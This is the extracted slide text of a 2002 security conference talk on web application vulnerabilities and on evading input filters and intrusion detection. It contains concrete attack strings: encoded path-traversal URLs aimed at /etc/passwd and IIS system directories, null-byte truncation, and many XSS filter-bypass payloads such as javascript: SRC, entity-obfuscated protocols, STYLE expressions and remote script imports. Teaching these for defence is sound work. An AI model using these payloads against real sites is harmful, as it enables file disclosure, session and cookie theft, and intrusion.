Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Taking Aim at Web Applications Dennis Groves Bill Pennington
Mar 26, 2015
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
Taking Aimat Web Applications
Dennis Groves
Bill Pennington
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
2
Introduction
Bill PenningtonPrincipal Consultant, Guardent
Tested over 300 web applications of the past 3 years
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
3
Dennis Groves
Specialty: Enterprise Security, Web Application Security, Pen-Testing & Quality Assurance.Bio: Dennis is currently the Director of Internet Security Consulting for Centerstance, Inc. For the last 3 years his primary focus has been on Web Application Security. He is a founding member of the Open Web Application Project and a former Sanctum employee, he played a key role in the development of AppScan.
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
4
Why is this important?
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
5
Topics
This is not new
Why your firewall doesn’t matter
Types of attacks
Filter, Filter, Filter
Do you know where your data is?
Tools to help you
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
6
This is Not New
Problems with web applications are the same problems with standalone applications
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
7
Why your Firewall doesn’t matter
Standard rant
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
8
Top 5 Vulnerabilities
SQL insertion
XSS
Session Hijacking
Parameter manipulation
Unbounded file calls
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
9
Cross site scripting, Why you should care.
XSS is not an attack on the server, it is an attack on the users of your application
So what?Identity theft
User masquerading
Reputation Risk
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
10
SQL Insertion
Most common on MS based applications.
All SQL apps are vulnerable (Oracle, Sybase, DB2…)
Can lead to full compromise of the server (xp_cmdshell)
Almost guarantied to lead to data compromise
Demo…
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
11
Cross Site Scripting (XSS)
Found in 98% of applications I test
2 main typesTransient (URL basedP
http://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>
Sticky – Script placed in a static bit of web content
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
12
XSS continued…
Transient generally requires user interaction
What can happen?Possibilities are only restricted by the client
Cookie theft most common example
But I filter “<“ and “>”Jscript entities “&{alert(‘Test')};”
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
13
Session Hijacking
HTTP is stateless so application designers must build a way to track state
Cookies and URL strings are the most common ways to track state
Both are easily exploitable
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
14
Session Hijacking continued…
Generally the next thing to occur after XSS
Please people logout means logout!
Examples of common session tracking issues
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
15
Parameter Tampering
Programmers will store data anywhere!URL parameters http://badapp.com/checkout.pl?p=$1.00
Cookies – Cookie:p=$1.00
Hidden fields – not really hidden
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
16
Unbound File Calls
Ye Ole’ ../../
Watch out you don’t display important information (global.asa)
Most application languages will take URL’s as file arguments
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
17
Do you know where your data is?
Building an exclusionary filter is difficult because your data is all over the place
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
18
Data Flow example
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
19
Designing a proper filter
Make all filters default denyDon’t try to exclude “bad stuff”
Try to get a good idea where your data is going
Log all filter violations
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
20
Examples
ASP
PHP
Jscript
Perl
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
Bypassing poorly designed filters
All warfare is based on deception…If he is in superior strength, evade him.
–Sun Tzu, The Art of War, 500BC
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
22
Evasion is the art of blending in so you will not be noticed; of course this age old
technique of survival is still useful today.evade
1. to escape or avoid somebody or something, usually by ingenuity or guile
2. to avoid doing something unpleasant, especially something that is a moral or legal obligation
3. to avoid dealing with or responding directly to something
4. to be difficult or impossible for somebody to find, obtain, or achieve (formal)
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
23
Filter Bypassing is a technique to evade detection by filtering systems.
Filter Bypassing techniques come in many varieties when applied to the many facets of web application security. The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system.Many of the described techniques can be highly effective when used properly and even become more powerful when used in combination.
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
24
Most filter systems are very simple as the flow chart shows.
Seven forms of ingenuity:URL Encoded Strings
Double Hex Encoding
Unicode Encoded String
Long URLs
Case Sensitivity
XSS Filter-Bypass Manipulation
Null Character Injection
Evade: 1. to escape or avoid somebody or something, usually by ingenuity or guile…
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
25
The Hex Advantage
By URL hex encoding URL strings, it may be possible
circumvent filter security systems and IDS.
http://foo.com/cgi?file=/etc/passwd
Can become:
http://foo.com/cgi?file=/%2F%65%74%63
%2F%70%61%73%73%77%64
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
26
Double Hex Encoding
In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.
The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.
An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability.
When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.
IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.
This secondary decoding was the source of another Vulnerability.
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
27
IIS Double HexRound 1 Decoding:scripts/..%255c../winntbecomes:scripts/..%5c../winnt(%25 = “%” Character)
Round 2 Decoding:scripts/..%5c../winntbecomes:scripts/..\../winnt
Directory path traversal is now possible using path obfuscation through Double Hex Encoding.
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
28
The Unicode Slash
In unicode, “%c0%af”, is the equivilent to a slash (“/”).
Therefore the common URL IIS exploit:scripts/..%c0%af../winnt
becomes:scripts/../../winnt
Once again, directory path traversal is now possible using path obfuscation through Unicode.
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
29
Double Slash
Double Slash using multiple directory slashes in URLs. For example: http://www.foo.com/..//etc//passwd.
Can be used to move under the radar of IDS systems and still function properly.
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
30
Many system put limits on how much data a variable can store or a system can handle.
Often times if these limits are exceeded, the data will still be used, but bypass certain security considerations.URL’s such as:http://www.foo.com/cgi?param=filename
Replaced with: http://www.foo.com/cgi?param=<2K_of_Data>
Long URL’s
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
31
Case Sensitivity
Case sensitivity may play a roll in many security filtration systems.Alternating case on URL parameters may be used to bypass certain restrictions.
http://foo.com/cgi?param=barhttp://foo.com/cgi?param=BaRhttp://foo.com/CGI?param=BAR
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
32
Method Switching
Many web applications do not properly perform HTTP Request Method sanity checking.
Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms.
Most web servers do not log "POST" data and thus forensic analysis is harder to perform.
The Request Method: GET /cgi-bin/some.cgi
can become: POST /cgi-bin/some.cgi
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
33
The Method token indicates the method to be performed on the resource identified by the Request-URI.
HTTP 1.1 Methods
OPTIONSGETHEADPOST PUTDELETETRACECONNECT
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
34
Using your “HEAD”
The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data.
Scans and web application attacks can be made to be more effective using this technique.
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
35
Null Character Injection
Hex encoded null characters can be used to thwart some security mechanisms.
This happens because in the “C” programming language, a null character designates the end of a string.
So If a CGI appending a “.html” to an input parameter:
http://foo.com/cgi?file=../../etc/passwd%00
Will cut off appending “.html”.
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
36
Unicode (UTF-8) Encoded
Unicode is a universal way to represent characters.
However, unicode can also be used to circumvent security mechanisms by representing information in another fashion.
Microsoft IIS has had security issues in the past while supporting unicode.
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
37
URL Encoded String
The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set:
"...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
38
XSS Filter-Bypass Manipulation
This technique is used pass various types of client-side scripting language through implemented security filters.
The idea is to be able to achieve client-side execution of a client-side script.
There are several techniques used to perform this attack.
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
39
Test the Filters
Submit all the raw HTML tags you can find, and then view the output results.Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler).This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited.
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
40
SRCing the protocol
Using the “javascript” protocol in an HTML source attribute.
<IMG SRC="javascript:js_expression">
<IMG SRC="javascript:alert('test');">
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
41
Alternate Protocol SRCing
Same technique as the previous, however, using the protocol “livescript” and “mocha” will yield the same effect.
<IMG SRC=“livescript:js_expression">
<IMG SRC=“mocha:alert('test');">
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
42
Decimal HTML Entities
Variation on previous techniques, using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript.
<IMG SRC=“java
script:js_expression">
\09 \10 \11 \12 \13 have all been seen to work
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
43
Hex HTML Entities
Another variation on the previous example, HEX HTML entities may also be used to bypass filter restriction, yet execute JavaScript.
<IMG SRC=“java
script:js_expression">
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
44
Padding HTML Entities
Padding HTML entities with “0’s” may also be used to bypass the filters, yet still execute JavaScript.
<IMG SRC=“java	script:js_expression">
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
45
STYLE JavaScript Type
Changing the MIME-TYPE on a “style” tag may be used to execute JavaScript.
<style TYPE="text/javascript">JS EXPRESSION</style>
<style TYPE="text/javascript">Alert(document.domain);</style>
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
46
STYLE JavaScript X-Type
Variation on the previous example, but by using the “application/x-javascript” MIME-TYPE, the filters may be bypassed.
<STYLE TYPE="application/x-javascript">
alert('JavaScript has been Executed');
</STYLE>
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
47
STYLE JavaScript Import
Using the @import feature in CSS may be used to perform JavaScript protocol SRCing.
<style TYPE="text/css">
@import url(javascript:alert('Javascript is executed'));
</style>
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
48
STYLE URL Import
Using the @import feature in CSS can also be used to import JavaScript from another HTTP resource.
<STYLE type=text/css>
@import url(http://www.test.com);
</STYLE>
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
49
LINK Style Sheet
The “LINK” tag can be used to import JavaScript from a remote HTTP resource.
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
50
Style Left Expression
A few CSS features used together to execute JavaScript.
<P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))" >
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
51
Remote SRCing
A few HTML tags, such as “LAYER”, “ILAYER”, “FRAME”, and “IFRAME” can be used to src in JavaScript from remote resources.
<LAYER SRC="js.html"></LAYER>
<LAYER SRC="js.html"></LAYER>
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
52
AND CURLY
<IMG SRC="&{javascript_expression};">
<IMG SRC="&{alert(‘alert’)};">
Syntax must be exact.
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
53
Dangerous HTML Tags
“All HTML is to be considered dangerous, but these tags are the most insidious.”
<APPLET><BODY><EMBED><FRAME><FRAMESET><HTML><IFRAME><IMG><LAYER><ILAYER><META><OBJECT><SCRIPT><STYLE>
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
54
Dangerous HTML Attributes
(HTML Tags with these attributes.)SRC
LOWSRC
STYLE
HREF
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
55
Why automated tools don’t work very well
Every programmer does things a little differentAuthentication schemes are hard to automateError codes are not standardizedSometimes simple things like SSL get in the waySome good things:
CompletenessLarge knowledge bases (at least possibly)
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
56
Why people are better
Recognition of subtle errors
We understand the impact and therefore the risk of a vulnerability
We can find “real” bugs, flaws in logic
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
57
One tool to rule them all…
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
58
Conclusion
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
59
Questions